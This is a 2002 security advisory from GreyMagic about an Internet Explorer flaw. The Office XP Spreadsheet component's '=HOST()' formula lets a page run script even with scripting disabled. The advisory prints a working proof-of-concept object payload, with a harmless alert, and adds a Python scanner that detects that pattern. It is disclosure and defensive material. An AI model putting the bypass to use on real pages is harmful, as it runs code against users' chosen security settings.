Scripting for the scriptless with OWC in IE (GM#005-IE)

From: GreyMagic Software (security@GREYMAGIC.COM)
Date: 04/08/02


Date:         Mon, 8 Apr 2002 17:18:11 +0200
From: GreyMagic Software <security@GREYMAGIC.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

GreyMagic Security Advisory GM#005-IE
=====================================

By GreyMagic Software, Israel.
08 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm005-ie/.

Topic: Scripting for the scriptless with OWC in IE.

Discovery date: 10 Mar 2002.

Affected applications:
======================

Office XP - Office Web Components 10, Spreadsheet component.

Introduction:
=============

Office Web Components (OWC) is a group of components marked "safe for
scripting", used to enrich HTML documents with Spreadsheets, Charts, Pivot
tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as
a separate (free for viewing only) component.

Discussion:
===========

Office XP introduced OWC10, which added many interesting features. One of
the features added to the Spreadsheet component is the "=HOST()" formula,
which returns a handle to the hosting environment.

This formula can be used to manipulate the DOM, which is a security issue in
itself when Active Scripting is disabled, but on its own it is somewhat
limited because there is no way to add logic (conditions, loops, etc.) to
the calls made.

However, with a bit of manipulation it is possible to get Active Scripting
to kick in. By calling the setTimeout method of the window object through
the "=HOST()" formula, it is possible to execute script in any language
available to the host (IE).

Exploit:
========

This example displays a message box even when scripting is disabled; it
contains many quotes because several levels of escaping (HTML attribute,
CSV, spreadsheet formula string) are needed:

<object classid="clsid:0002E551-0000-0000-C000-000000000046"
        style="display:none">
    <param name="csvdata"
           value='"=HOST().parentWindow.setTimeout(""var i=20; alert(i+""""+3 equals """"+(i+3));"",10,""jscript"")"'>
</object>
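For defenders, an added example that is not part of the advisory: a small scanner that walks an HTML document and flags any <object> whose "csvdata" param carries the "=HOST()" formula, recording whether the object's classid is the OWC10 Spreadsheet CLSID quoted above. The sample document is constructed here and reuses the advisory's pattern next to a benign spreadsheet.

```python
from html.parser import HTMLParser
import re

# CLSID of the OWC10 Spreadsheet component, as quoted in the advisory's exploit.
OWC_SPREADSHEET_CLSID = "0002e551-0000-0000-c000-000000000046"
# Match the =HOST() formula; HTMLParser decodes entities in attribute values
# before we see them, so entity-encoded variants are matched as well.
HOST_FORMULA = re.compile(r"=\s*HOST\s*\(", re.IGNORECASE)


class OwcHostScanner(HTMLParser):
    """Flags <object> tags whose csvdata param contains the =HOST() formula."""

    def __init__(self):
        super().__init__()
        self.current_clsid = None   # classid of the <object> we are inside, if any
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            self.current_clsid = attrs.get("classid", "").lower().replace("clsid:", "")
        elif tag == "param" and self.current_clsid is not None:
            if attrs.get("name", "").lower() == "csvdata":
                value = attrs.get("value", "")
                if HOST_FORMULA.search(value):
                    self.findings.append({
                        "line": self.getpos()[0],
                        "clsid": self.current_clsid,
                        "is_owc_spreadsheet": self.current_clsid == OWC_SPREADSHEET_CLSID,
                        "csvdata": value,
                    })

    def handle_endtag(self, tag):
        if tag == "object":
            self.current_clsid = None


def scan_html(html):
    """Return a list of findings (one per suspicious csvdata param)."""
    scanner = OwcHostScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the advisory's object (message shortened) next to a
# benign Spreadsheet object whose csvdata is ordinary cell data.
SAMPLE_HTML = """
<object classid="clsid:0002E551-0000-0000-C000-000000000046" style="display:none">
    <param name="csvdata" value='"=HOST().parentWindow.setTimeout(""alert(1)"",10,""jscript"")"'>
</object>
<object classid="clsid:0002E551-0000-0000-C000-000000000046">
    <param name="csvdata" value="Item,Qty,Price">
</object>
"""
```

Running scan_html(SAMPLE_HTML) yields exactly one finding, for the first object, with is_owc_spreadsheet set to True.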

Solution:
=========

If you prefer to browse with Active Scripting disabled, make sure to set
"Run ActiveX controls and plug-ins" to "Disable" as well. Unfortunately,
this also prevents other components, such as Flash, from being displayed,
so you may prefer to temporarily disable the Spreadsheet component instead.

Microsoft has been informed and has opened an investigation into this
issue.

Tested on:
==========

IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6sp1 Win2000 + OWC10, all patches.
IE6sp1 WinXP + Office XP (OWC10), all patches.

Demonstration:
==============

We put together two proof-of-concept demonstrations; please disable Active
Scripting before viewing them, in order to see how the setting is bypassed:

* Simple: the example shown in the "Exploit" section.
* Advanced: lets the user write the script, choose the scripting language
and execute.

They can both be found at http://security.greymagic.com/adv/gm005-ie/.

Feedback:
=========

Please mail any questions or comments to security@greymagic.com.

- Copyright 2002 GreyMagic Software.
